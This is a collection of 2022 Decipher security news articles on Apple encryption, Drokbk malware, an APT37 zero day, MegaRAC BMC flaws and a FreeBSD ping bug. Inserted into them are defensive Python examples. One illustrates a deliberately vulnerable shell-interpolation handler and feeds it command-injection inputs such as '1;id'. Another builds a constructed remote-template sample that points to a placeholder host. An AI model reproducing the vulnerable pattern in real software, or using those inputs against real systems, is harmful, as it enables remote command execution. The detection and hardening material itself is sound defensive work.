Decipher (https://decipher.sc) is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Contact: info@decipher.sc (Amy Vazquez). Copyright 2022.

Apple to Encrypt iCloud Backups, Enable Hardware Security Keys for 2FA
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/apple-to-encrypt-icloud-backups-enable-hardware-security-keys-for-2fa

Security and privacy experts, cryptographers, and customers for years have been urging Apple to implement end-to-end encryption for its iCloud backups, and the company is finally on the cusp of doing so.

By the end of the year, Apple customers in the United States will have the option of enabling Advanced Data Protection for iCloud, which extends E2EE to iCloud Backup, Notes, and Photos, along with a number of other data categories. The move will eliminate one of the major weak spots in Apple’s data protection infrastructure: the iCloud backups of users’ device data. Right now, those backups are encrypted in storage, but Apple holds the keys, which makes them a target for attackers who compromise Apple’s infrastructure or a user’s account credentials and also makes them reachable by law enforcement agencies with proper authorization. When users opt in to Advanced Data Protection, the backups will be encrypted end-to-end with keys held only on the user’s trusted devices, and Apple will not be able to decrypt them. Because Apple can no longer recover the data, users must set up a recovery contact or a recovery key before the feature can be enabled.

“Advanced Data Protection is Apple’s highest level of cloud data security, giving users the choice to protect the vast majority of their most sensitive iCloud data with end-to-end encryption so that it can only be decrypted on their trusted devices,” said Ivan Krstic, Apple’s head of security engineering and architecture.

The new option is already available to people who are in Apple’s beta program and should be generally available to U.S. users by the end of 2022, with other regions following in early 2023. The move will not sit well with law enforcement agencies that have relied on access to those iCloud backups for many years.

“In this age of cybersecurity and demands for ‘security by design,’ the FBI and law enforcement partners need ‘lawful access by design,’” the FBI said in a statement to The Washington Post.

Along with the change to iCloud backups, Apple is adding two other security features to its ecosystem, including the ability for people to use hardware security keys as a second factor of authentication when signing into their Apple IDs. At the moment, Apple’s two-factor authentication delivers a six-digit verification code to a trusted device or, as a fallback, by SMS; both are weaker than a FIDO hardware security key, which is bound to the legitimate site and cannot be phished or redirected the way a code can.

The third new addition is a feature in iMessage that is designed to prevent attackers from being able to add a new device into an iMessage conversation in order to eavesdrop on it. Both iMessage and FaceTime conversations are encrypted, but an attacker who can gain access to one of Apple’s servers may be able to insert a device into someone else’s private conversations. To defeat this, Apple is introducing iMessage Contact Key Verification.

“Conversations between users who have enabled iMessage Contact Key Verification receive automatic alerts if an exceptionally advanced adversary, such as a state-sponsored attacker, were ever to succeed breaching cloud servers and inserting their own device to eavesdrop on these encrypted communications. And for even higher security, iMessage Contact Key Verification users can compare a Contact Verification Code in person, on FaceTime, or through another secure call,” Apple said.

The key verification feature is meant mainly for high-risk users such as activists, journalists, and celebrities, but will be available to anyone sometime in 2023.

Cobalt Mirage Actors Deploying Drokbk Malware in Recent Campaigns
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/cobalt-mirage-actors-deploying-drokbk-malware-in-recent-campaigns

An Iranian threat group that performs both cyber espionage and financially motivated attacks has been using a piece of malware called Drokbk as part of recent intrusions that rely on GitHub as a dead-drop resolver to communicate new information to infected machines.

Drokbk has been seen in intrusions for the last few months, typically after a threat actor has exploited the Log4Shell vulnerability in VMware Horizon servers. Researchers at Secureworks have been tracking attacks by the threat actor known as Cobalt Mirage that deploy Drokbk after initially exploiting the Log4Shell flaws in Horizon servers, including an intrusion in February at a local government in the United States. Drokbk comprises two main components, a dropper and the main payload, and is used by a specific subgroup of Cobalt Mirage known as cluster B.

“The malware has limited built-in functionality and primarily executes additional commands or code from the command and control (C2) server. Early signs of its use in the wild appeared in a February 2022 intrusion at a U.S. local government network,” a new Secureworks Counter Threat Unit report (https://secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver) says.

“SessionService.exe is the main malware payload, and it begins by finding its C2 domain. A C2 domain is often preconfigured in malware. However, Drokbk uses the dead drop resolver technique to determine its C2 server by connecting to a legitimate service on the internet (e.g., GitHub). The C2 server information is stored on a cloud service in an account that is either preconfigured in the malware or that can be deterministically located by the malware. The binary uses the GitHub API to search for the 'mainrepositorytogeta' repository. This code identifies the specific GitHub account and the request used to locate the malware's C2 server. The response is stored within the README.md file hosted on the GitHub account. In this campaign, the threat actor used a GitHub account with the username Shinault23.”

The campaign using this technique likely began in June, as that’s when the first commit to the GitHub repository occurred. Over the next few weeks, the Cobalt Mirage actors changed the C2 domain several different times and many of the domains had been used in other campaigns by Cobalt Mirage cluster B.
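The dead-drop pattern above leaves a distinctive trace on the network: a host that has no business with GitHub asks the repository-search API for one specific name, then immediately reads a README. The following is an added hunting example, not Secureworks’ tooling or Drokbk code. The proxy log format, the process allowlist and the raw.githubusercontent.com URL are assumptions; only the repository name comes from the report.

```python
"""Hunt for dead-drop-resolver traffic in web proxy logs.

Added example, not Secureworks' tooling or Drokbk code. It scans constructed
proxy log lines (timestamp, source host, process image, URL) for calls to the
GitHub repository-search API from processes that are not normal GitHub
clients, then pulls the follow-on README fetch that completes the pattern.
The log format, process allowlist and raw.githubusercontent.com URL are
assumptions; only the repository name "mainrepositorytogeta" comes from the
Secureworks report.
"""
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Processes expected to talk to api.github.com on a developer box (assumption).
ALLOWED_PROCESSES = {"git.exe", "code.exe", "gh.exe"}

# Constructed log lines; the Horizon server entries model the malware's lookup.
SAMPLE_LOG = """\
2022-06-14T09:12:01Z ws-dev-01 code.exe https://api.github.com/repos/octo/demo/contents/README.md
2022-06-14T09:12:07Z srv-horizon-02 SessionService.exe https://api.github.com/search/repositories?q=mainrepositorytogeta
2022-06-14T09:12:08Z srv-horizon-02 SessionService.exe https://raw.githubusercontent.com/example-account/mainrepositorytogeta/main/README.md
2022-06-14T09:13:44Z ws-dev-03 git.exe https://api.github.com/search/repositories?q=tetris+language:python
"""


def _parse_ts(ts):
    # fromisoformat() does not accept a trailing 'Z' before Python 3.11.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def parse_line(line):
    ts, host, process, url = line.split(maxsplit=3)
    return {"ts": ts, "host": host, "process": process, "url": url}


def repo_search_query(url):
    """Return the 'q' term if url is a GitHub repository-search call, else None."""
    u = urlsplit(url)
    if u.netloc.lower() != "api.github.com" or u.path != "/search/repositories":
        return None
    q = parse_qs(u.query).get("q")
    return q[0] if q else None


def find_dead_drop_lookups(log_text, allowed=ALLOWED_PROCESSES):
    """Repository searches issued by processes outside the allowlist.

    Returns (timestamp, host, process, query) tuples. A match is a lead, not a
    verdict: confirm the second stage with follow_on_readme_fetches().
    """
    allowed_lc = {p.lower() for p in allowed}
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        query = repo_search_query(rec["url"])
        if query is None or rec["process"].lower() in allowed_lc:
            continue
        hits.append((rec["ts"], rec["host"], rec["process"], query))
    return hits


def follow_on_readme_fetches(log_text, host, after_ts, window_s=120):
    """README reads by `host` within window_s seconds after a flagged search.

    Covers the raw content host and the REST endpoints
    (/repos/{owner}/{repo}/readme, .../contents/README.md).
    """
    start = _parse_ts(after_ts)
    urls = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["host"] != host:
            continue
        delta = (_parse_ts(rec["ts"]) - start).total_seconds()
        u = urlsplit(rec["url"])
        is_readme = (u.netloc.lower().endswith("githubusercontent.com")
                     or u.path.lower().endswith(("/readme", "/readme.md")))
        if 0 <= delta <= window_s and is_readme:
            urls.append(rec["url"])
    return urls


if __name__ == "__main__":
    for ts, host, proc, query in find_dead_drop_lookups(SAMPLE_LOG):
        print(f"{ts} {host} {proc} searched GitHub for repo {query!r}")
        for url in follow_on_readme_fetches(SAMPLE_LOG, host, ts):
            print("  followed by README fetch:", url)
```

The allowlist is the weak point of any such rule: a compromised developer workstation would hide behind git.exe. Pair it with the process image path and code-signing state where the proxy or EDR can supply them.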

Cobalt Mirage is a relatively new threat actor that started operating in early 2021. The group is known to abuse Windows BitLocker to encrypt victims’ files in ransomware-style operations and often goes after organizations in the U.S., Israel, and Europe. The actor typically exploits known vulnerabilities such as Log4Shell and ProxyShell for initial access and is linked to the Iranian military.

Q&A: Haroon Meer
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/q-and-a-haroon-meer

Haroon Meer, founder of Thinkst Applied Research, recently joined Dennis Fisher on the Decipher podcast to talk about recent changes in the security industry, the economic downturn, and how to get value out of conferences. This is an edited and condensed transcript of that conversation.

Dennis Fisher: I was reading this blog post by Mark Curphey from Crash Override talking about this coming security tools crash. And there's a lot of stuff in there about the pullback from VCs, people, companies and founders who, say two years ago, or two and a half years ago, didn't know how long the pandemic was going to last. So they, maybe raised a whole bunch of money for the next couple years. And now those bills are coming due. Right. And as you said, the stock market is going down, the revenue might not be there. So people are going to start looking at all these things that they bought or may have wanted to buy and be like, well, we can't do all of this.

Haroon Meer: I think everybody's been talking about the market correction for security tools. And again, I think the same old curmudgeons who are waiting for the crypto collapse have also been waiting for this right sizing almost like the market has been frothy for too long. Like I've complained about it in the past and not because I have a problem with people getting money. A long time ago, I heard Moxie Marlinspike, he was on a review board for funding security projects. And at some point Moxie says hey, if I'm allocating other people's money out, I'll give money to everyone who wants to do a security project. I'm fine with it, like fund it all. And it's an interesting point, except I think security does have a problem when the markets are frothy, because there's a lot more noise in the system. And it's a lot harder for people, to quote your colleague, Wendy Nather’s line, for people who are on or just below the security poverty line, they can't easily tell the difference between what's just been funded and what actually adds value. And so hopefully, I'm happy with some of that froth getting cleaned up.

But it's hard to tell. Certainly when COVID hit, there were lots of people who were worried about whether security would take a beating. And I don't think it did. I think security was kind of immune to it, for the most part, like people did cuts. But we're scared to cut into security. And so I don't know how much this cut will affect security. I think security needs a little bit of justify your existence. I'm not convinced that it'll hurt. Security seems to be like a cockroach that just survives no matter what.

Dennis Fisher: I think that's true. It's proven to be true in the last 20 years, since cybersecurity really became its own thing, that it's been pretty resistant to most of the severe ups and downs. Part of that is due to just the fact that threats have expanded.

Haroon Meer: The threats went on, the dependency is more real. Like 20 years ago, if stuff went down, it wasn't political. And now stuff goes down. And people don't know what to do with their lives. So I think that's true. Look for us personally, speaking as a vendor, we were lucky, like, we didn't know how things would go during COVID. For us, we had a lot of feedback from people going, Hey, we'll do cuts, but like, we won't cut you guys and impact, like we fought hard. We've never increased our prices, like with Canaries from day one. And, it's the most logical thing to do, the market will tolerate an increase every year. And for us as a company we don't think we need to. I think lots of people will say, so you've got to consider the source. But we focus crazy hard on making sure. Like, we think we are adding fair value. And so even when things get tighter, it's a lot harder for people to go, oh, let's throw that out. Because that's a waste of money. Because mostly we have pretty good value. And we should be good. But what we did see the last time, like, the last time we braced, and it's shockingly small. But we monitored closely. We had about eight companies who pinged us to say listen, they think they're going out of business, or they're just about out of business. And our response to all of them was, hey, we'll carry you for a year. And from all of those, three of them went away, three of them shut their doors. And so that's one of those things that I think is a knock on and may happen this time. Also, anyone who sells ends up selling to a lot of other startups also. And if those startups get shuttered, then there's just a whole lot of money that drains out of the system.

Dennis Fisher: I think some of it in your case, and I can take a few other examples, has to do with just the simplicity of what you guys do. It's so easy to explain in 20 seconds. It's not like well, we have this machine learning model, and then we throw it through this AI algorithm. And then we come out with a network map.

Haroon Meer: There's two interesting things that happen. One is this human nature that says, if you've bought a product, and it's simple, the easiest thing to do is to just keep making it complex. Without it being part of anyone's grand plan, the industry forces you to do this. Like, if I did another podcast interview with you three years later, almost the logical question is, well, what's new in the product? What's the new stuff that you've done? And so people feel forced to show progress by saying, Here's how we've made the simple thing more complex. And it's really hard to go, No, we're going to spend a lot of effort making it even simpler. Because if we talk to someone, and they say, what's new, and you go, Oh, that thing that used to take three minutes now takes 30 seconds. It's like, people start asking questions like, no, what are you really doing with your time? And so there's lots of stuff like that, that pushes towards complexity, and we actively fight it as much as we can. And it's very easy to get it wrong.

Dennis Fisher: Part of that is because investors expect a product roadmap that shows some sort of graph that's like, Oh, we're adding new features every quarter. Not every product needs new features, like Oreos don't need more flavors. Chocolate and vanilla. It just works.

Haroon Meer: You're right. And it's not just investors. We've got customers now, like, we've been around for a while, right? So we've got customers who liked the stuff, it's worked for them, like it's saved them on their pen tests, it saved them when it mattered. And still, if a new PM comes in, or some new CEO comes in, it's quite common where they'll go, Okay, show us your roadmap. And you go, yeah, that's not why you use us. Here's the stuff we want to do, here's the direction we are moving in. But the industry is largely conditioned for some things, it will be interesting, because I suspect some of that's going to be changing through this downturn. Like, through this downturn, one of the most interesting things to see has been VC voices that have pivoted very quickly from growth at all costs to sustainability, revenue, reasonable growth. And so part of that thing becomes like, Okay, can you make your customers actually happy instead of dazzling them? Because now, that's the stuff that actually matters. And yeah, I suspect good value and sustainable businesses making a comeback.

Dennis Fisher: And I think simplicity too, right? Like, If you can do one or two or three things very, very well, that have a lot of value, and pare it down to the things that you're best at, you know, is, a lot of times what happens in downturns anyway. Companies look around, and they're like, well, we don't really need all these product lines, or we don't need all these services, or whatever the case may be. Here's the things that make us the most money and the things customers really come to us for. And let's do that. Let's focus on that.

Haroon Meer: Yeah, it'll be interesting to see, it's one of the interesting takes on the VC world is, like, there's a lot of talk about whether the last generation or the last few generations of tech founders have so grown up in a bullish economy that they don't know how to operate under conditions of hardship. And one of the genuine questions like when you look at security products, is, I'm not convinced that lots of people know how to do simple. Simple becomes one of those things that conceptually should be a lot easier. But it's surprisingly hard for people to pull off.

Dennis Fisher: I think there's a whole lot of truth to what you just said, because there is a generation, probably two generations now, of security founders and executives who have grown up in the business since the early 2000s when security took off, and it's kind of just been upward growth since then. If I just take the dumb example of RSA Conference, the first year I went in 2001, there's, I don't know, 1000 people there. Now there's 60,000 people there, right? And like 5000 vendors, and you're just like, What do all these people do? There aren't that many new problems to solve.

Haroon Meer: No. Honestly, it's been interesting for us. So I didn't visit RSA until I did by accident in 2018. And, and it's interesting, like, genuinely, I happen to be in SF at the same time. And I was like, okay, like, let me finally go see this thing. And, ah, it's mind blowing. But it actually did convince me to try it. And we've got this whole long blog post on how RSA has worked out for us. Because it's shockingly good. Like, like RSA as a vendor booth is amazing for us. But there's a few interesting things about it. The one is, like we do it unusually. So we take our developers there, the people who are on the booth floor, our engineers who build it or like, PM. I'm there. And it's always surprising, because customers come by, and we've got tons of customers that we've never met. And the new people come by, and the customers who are there end up saying nice things about us. And so then people buy our stuff. And we focus a lot on doing actual demos at the booth. So anytime you come there, people are demoing the product. And I'm amazed that people don't do this. You see these booths this year, like the past RSA. But there were two booths that had cars, one that had a DeLorean and one that had a race car. And I asked the lady with the race car, why is this here? Are you saying something about the product?

Dennis Fisher: Are you saying we are like a race car, very expensive and easy to break?

Haroon Meer: Yeah, she looked at me like I was the idiot. She was like, What do you mean? Like, here's a race car. And I was like, surely that can't be right. Surely, you've got to link the two, like, why did you do this? Um, no, there's no hint of it. If there's a young security company, and you are interested you should go check out our blog post on it. It surprises me and the young me hates that. It's true. But it's shockingly good for us.

Dennis Fisher: There's lots of things that our younger selves would hate us for.

Haroon Meer: Yes, yes.

Photo: Mohamed Nanahbay, CC BY 2.0 license.

North Korean APT37 Used Internet Explorer Zero Day
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/north-korean-apt37-used-internet-explorer-zero-day

A North Korean threat actor known for targeting victims in South Korea has been caught using an exploit for a zero day vulnerability in Internet Explorer by delivering malicious Microsoft Office documents.

Researchers with Google’s Threat Analysis Group discovered the vulnerability (CVE-2022-41128) on Oct. 31 after several people uploaded the malicious Office documents to VirusTotal. After analyzing the documents, the TAG researchers found that they download a remote template, which in turn fetches HTML content from an attacker-controlled server. The malicious documents used the Halloween incident in Seoul as a lure to entice victims to open them.

TAG reported the vulnerability to Microsoft, which released a fix for it on Nov. 8.

“The document downloaded a rich text file (RTF) remote template, which in turn fetched remote HTML content. Because Office renders this HTML content using Internet Explorer (IE), this technique has been widely used to distribute IE exploits via Office files since 2017 (e.g. CVE-2017-0199). Delivering IE exploits via this vector has the advantage of not requiring the target to use Internet Explorer as its default browser, nor to chain the exploit with an EPM sandbox escape,” a post by TAG researchers Clement Lecigne and Benoit Sevens says.

“Upon investigation, TAG observed the attackers abused an 0-day vulnerability in the JScript engine of Internet Explorer.”

The exploit that the attackers used is designed to bypass the protection that Internet Explorer has for opening potentially dangerous content downloaded from the internet.

“When delivering the remote RTF, the web server sets a unique cookie in the response, which is sent again when the remote HTML content is requested. This likely detects direct HTML exploit code fetches which are not part of a real infection,” the researchers said.

“The exploit JavaScript also verifies that the cookie is set before launching the exploit. Additionally it reports twice to the C2 server: before launching the exploit and after the exploit succeeds.”
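Both hops in the delivery chain TAG describes are visible in the files themselves: the .docx carries an external attachedTemplate relationship, and the fetched RTF carries a template or linked-object control word next to a URL. The following is an added detection example, not TAG’s tooling; the .docx and RTF samples are constructed in memory, the URLs are placeholders, and the control words (\*\template, \objautlink, \objupdate) are standard RTF.

```python
"""Flag Office files that pull a remote template (the delivery chain above).

Added example, not TAG's tooling. It checks the two places the chain touches:
a .docx whose settings relationships reference an external attachedTemplate
(the first hop), and an RTF that carries a template or linked-object control
word next to a URL (the CVE-2017-0199-style second hop). Samples are
constructed in memory; URLs are placeholders.
"""
from __future__ import annotations

import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

# Control words that make Word fetch a template or refresh a linked OLE object.
RTF_LINK_WORDS = re.compile(rb"\\\*\\template\b|\\objautlink\b|\\objupdate\b")
URL_RE = re.compile(rb"https?://[^\s\\{}]+", re.IGNORECASE)


def remote_templates_in_docx(data: bytes) -> list[str]:
    """External attachedTemplate targets in a .docx (empty list if none)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return found
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == ATTACHED_TEMPLATE
                    and rel.get("TargetMode") == "External"):
                found.append(rel.get("Target"))
    return found


def remote_refs_in_rtf(data: bytes) -> list[str]:
    """URLs in an RTF that also contains a template/linked-object control word.

    Heuristic only: a URL hidden as hex inside \\objdata is not decoded here.
    """
    if not data.lstrip().startswith(b"{\\rtf"):
        return []
    if not RTF_LINK_WORDS.search(data):
        return []
    return [m.decode("ascii", "replace") for m in URL_RE.findall(data)]


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx whose settings point at an external template."""
    rels = (f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_url}" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


# Constructed RTF: an attached remote template plus an auto-updating linked object.
SAMPLE_RTF = (b"{\\rtf1\\ansi"
              b"{\\*\\template http://template.example.invalid/stage2.rtf}"
              b"{\\object\\objautlink\\objupdate{\\*\\objdata 0105000002000000}}"
              b"}")


if __name__ == "__main__":
    docx = build_sample_docx("http://template.example.invalid/lure.rtf")
    print("docx remote templates:", remote_templates_in_docx(docx))
    print("rtf remote refs:", remote_refs_in_rtf(SAMPLE_RTF))
```

An external attachedTemplate is legitimate in some enterprise document workflows, so treat a hit as a triage signal and look at the target host; a template served from a freshly registered domain, or an RTF that returns HTML, is the tell.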

APT37 is also known as Reaper, and the group is mainly known for conducting cyber espionage campaigns directly aligned with the North Korean government’s interests. The group has used zero days in operations in the past, including CVE-2020-1380, an earlier Internet Explorer scripting engine flaw.

Decipher Podcast: Haroon Meer Returns
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/decipher-podcast-haroon-meer-returns

Trio of MegaRAC BMC Flaws Could Have Long Range Effects
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/trio-of-megarac-bmc-flaws-could-have-long-range-effects

There are three vulnerabilities in the MegaRAC baseboard management controller (BMC) firmware, which is used in a huge number of data centers and cloud platforms, that could present a serious, long-term threat to those environments as well as to enterprises that run their own affected servers.

MegaRAC BMC is among the more widely used BMC firmwares on the market and ships in systems from a wide range of hardware vendors, including AMD, HP Enterprise, Lenovo, Dell EMC, and Huawei. A BMC is essentially a separate computer that sits on the server board and provides an out-of-band management channel. It typically includes its own processor, networking stack, and firmware, and gives an administrator the ability to manage all aspects of the server, including power, console, and firmware updates, from a separate management interface that is independent of the host operating system. So an attacker who is able to gain privileged access to a server’s BMC would be in a powerful position on the box, below and largely invisible to the host OS and its security tooling.

The flaws in the MegaRAC BMC that researchers at Eclypsium discovered include a critical arbitrary code execution vulnerability (CVE-2022-40259) in the Redfish API in MegaRAC that is trivially exploitable and would give an attacker complete control of the BMC firmware. The attacker would only require remote access to the BMC interface, which ideally should not be exposed to the Internet, and at least some low-level privileges on the BMC. But if those conditions are present, then an attacker would have little trouble.

The long-term risk from these issues comes from the fact that MegaRAC is present in such a long list of servers and that getting updated BMC firmware onto all of those machines is slow and uneven, especially in massive data centers, where BMC firmware is rarely updated as often as host software.

“MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable,” the Eclypsium blog post on the flaws says.

“To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk.”

Eclypsium researchers discovered the three vulnerabilities earlier this year after finding some data from MegaRAC manufacturer American Megatrends Inc. online. After looking at the data, they realized it was legitimate and began looking for potential vulnerabilities. They eventually focused their attention on the Redfish API, the DMTF standard REST interface for managing servers and data center infrastructure, which has been replacing IPMI as the BMC management protocol. The arbitrary code execution bug is the most serious of the three, and the Eclypsium researchers developed a working exploit for it.

“To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command,” the researchers said.
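The crafted-input constraint Eclypsium describes (valid per URL and valid per bash) follows from RFC 3986, which allows characters such as ';', '$', '&', '(' and ')' raw in a path segment, while a percent-encoded payload would reach the shell still encoded and inert. The following is an added illustration of that bug class beside a hardened handler; it is not AMI’s code, and the endpoint, tool name and parameter are invented.

```python
"""The bug class in CVE-2022-40259 as Eclypsium describes it: a URL path
parameter handed over un-decoded by the framework and interpolated into a
bash command.

Added illustration, not AMI's code. The endpoint, tool name and parameter
are invented. It pairs the vulnerable pattern with a hardened one and shows
why a payload can be valid as a URL and as a shell command at the same time.
"""
from __future__ import annotations

import re
import shlex
from urllib.parse import unquote

# Redfish member ids are short tokens; anything else is rejected.
ID_OK = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
# Characters that split one command into several or start an expansion.
SHELL_META = set(";|&$`<>(){}*?!\"'\\ \t\r\n")


def vulnerable_command(raw_segment: str) -> str:
    """Vulnerable pattern: the raw path segment is interpolated into a shell string."""
    return f"/usr/local/bin/bmc-cli show-member {raw_segment}"


def is_valid_id(raw_segment: str) -> bool:
    """Decode first (the framework did not), then allowlist the result."""
    return ID_OK.fullmatch(unquote(raw_segment)) is not None


def hardened_command(raw_segment: str) -> list[str]:
    """Hardened pattern: allowlist the decoded value and pass it as one argv
    element to subprocess.run(argv) with no shell in between."""
    value = unquote(raw_segment)
    if not is_valid_id(raw_segment):
        raise ValueError(f"rejected member id: {value!r}")
    return ["/usr/local/bin/bmc-cli", "show-member", value]


def injection_tokens(cmd: str) -> list[str]:
    """Tokens bash would treat as syntax rather than as part of the argument.

    shlex with punctuation_chars=True splits ';', '|', '&', '(', ')', '<', '>'
    into their own tokens; a lone '$' or '`' is emitted as a single token too.
    An empty list means the segment reached the tool as one plain argument.
    """
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    meta = set("();<>|&$`")
    return [tok for tok in lexer if set(tok) & meta]


def looks_like_shell_injection(path: str) -> bool:
    """Request-log heuristic: any path segment that decodes to shell syntax."""
    return any(ch in SHELL_META
               for seg in path.split("/") for ch in unquote(seg))


if __name__ == "__main__":
    for seg in ("Self", "1;id", "1$(id)", "1%20%26%26%20id"):
        cmd = vulnerable_command(seg)
        print(f"{seg!r:22} shell syntax seen: {injection_tokens(cmd)!r:18} "
              f"valid id: {is_valid_id(seg)!s:5} "
              f"flag in log: {looks_like_shell_injection('/redfish/v1/Systems/' + seg)}")
```

The last sample in the loop is the point Eclypsium makes: '1%20%26%26%20id' is a perfectly good URL, but because the framework never decodes the path, bash sees the percent signs literally and nothing is injected, so the attacker is limited to characters that are legal both raw in a URL path and meaningful to bash. The hardened handler removes the question by decoding once, allowlisting, and never building a shell string.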

The other two flaws are less serious but still could present problems. One is the presence of default user credentials (CVE-2022-40242), and the other is the ability to enumerate users through the API (CVE-2022-2827).

“The vulnerabilities can be exploited by any remote attacker having access to remote management interfaces (Redfish, IPMI). The impact of exploiting these vulnerabilities includes remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking),” Nate Warfield, director of threat research and intelligence at Eclypsium, said.

“Organizations with large server farms, data centers, and potentially cloud and hosting providers are particularly vulnerable for this kind of exploit. Attack scenarios could be as simple as attackers using CVE-2022-40242 (default superuser credentials) to login to affected servers, or a more complex scenario could be using CVE-2022-2827 to find a user account, then use brute force attacks/credential stuffing to determine the password. From there, CVE-2022-40259 could be exploited as it only requires a user account with privilege level higher than ‘None’.”

Eclypsium reported the vulnerabilities to AMI and updates from server manufacturers likely will be forthcoming. Warfield said they are not aware of any evidence of attackers exploiting these flaws in the wild, and GreyNoise, which monitors the Internet for exploit traffic, said it has not seen any IP addresses attempting to exploit these flaws, either.

FreeBSD Patches RCE Flaw in Ping
By Dennis Fisher (dennis@decipher.sc), https://duo.com/decipher/freebsd-patches-rce-flaw-in-ping

All supported versions of FreeBSD are vulnerable to a potential code execution bug in the ping utility that a remote host can trigger by returning a crafted reply to a ping.

The vulnerability is a stack buffer overflow and the maintainers of FreeBSD have released updates for all of the affected versions that resolve the issue. Ping is a utility present in many systems that is used to determine whether a given host is reachable. It relies on the ICMP protocol and sends ICMP packets to a given remote host and listens for a reply to see whether that host is reachable on the network.

The vulnerability (CVE-2022-23093) is a result of the way that ping handles IP option headers when it reconstructs received packets.

“Ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header,” the FreeBSD advisory says.

“The pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.”

The most likely result of an attacker triggering this vulnerability is that the ping process would crash, but it may also be possible for an attacker to gain code execution. The advisory notes that ping runs in a capability-mode (Capsicum) sandbox on all affected versions, which tightly constrains what any code execution could do. There are no known workarounds for the issue, so the best course of action is to upgrade to a patched build; the fix shipped as updated patch levels of the supported 13.1 and 12.x release branches.
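The 40-byte figure follows from the IPv4 header format: IHL is a 4-bit count of 32-bit words, so a header is 20 to 60 bytes long, and a buffer sized for the option-less struct ip has 40 bytes less room than the largest header a peer can send. The following is an added example, not FreeBSD’s code: it builds the kind of reply the advisory describes, with the options in the quoted packet, and walks it the way pr_pack() does, reporting how far each header copy would overrun. Packets and addresses are constructed.

```python
"""Why IP options overflow the fixed header buffer in pr_pack().

Added example, not FreeBSD's code. It builds an ICMP Time Exceeded reply whose
quoted packet carries a 40-byte IP options field, walks it the way pr_pack()
does (outer IP header, ICMP header, quoted IP header) and reports how many
bytes a copy sized for a 20-byte option-less header would spill. Packets and
addresses are constructed; the 20/40/60-byte figures are IPv4 facts.
"""
import struct

IP_FIXED_HDR = 20            # sizeof(struct ip): the size of the stack buffer
IP_MAX_OPTIONS = 40          # 60-byte maximum header minus the fixed 20
ICMP_HDR = 8                 # type, code, checksum, 4 bytes of header data
ICMP_ERRORS_WITH_QUOTE = (3, 11, 12)   # unreachable, time exceeded, param problem


def build_ipv4_header(options: bytes, payload_len: int, proto: int = 1) -> bytes:
    """Constructed IPv4 header; options must be a multiple of 4 bytes, at most 40."""
    if len(options) % 4 or len(options) > IP_MAX_OPTIONS:
        raise ValueError("options must be 0..40 bytes in 4-byte steps")
    ihl = (IP_FIXED_HDR + len(options)) // 4
    total_len = IP_FIXED_HDR + len(options) + payload_len
    fixed = struct.pack("!BBHHHBBH4s4s",
                        (4 << 4) | ihl, 0, total_len, 0, 0, 64, proto, 0,
                        bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return fixed + options


def ip_header_len(pkt: bytes) -> int:
    """IHL * 4: the length a receiver uses to find where the IP header ends."""
    return (pkt[0] & 0x0F) * 4


def fixed_copy_overflow(pkt: bytes) -> int:
    """Bytes that spill past a 20-byte destination if the whole IHL*4 header is
    copied: 0 without options, up to 40 with a maximal options field."""
    return max(0, ip_header_len(pkt) - IP_FIXED_HDR)


def bounded_header_copy(pkt: bytes) -> bytes:
    """A safe alternative: copy only the fixed header and step over the options.
    (Illustrative fix direction, not the exact FreeBSD patch.)"""
    hlen = ip_header_len(pkt)
    if hlen < IP_FIXED_HDR or hlen > len(pkt):
        raise ValueError("malformed IP header")
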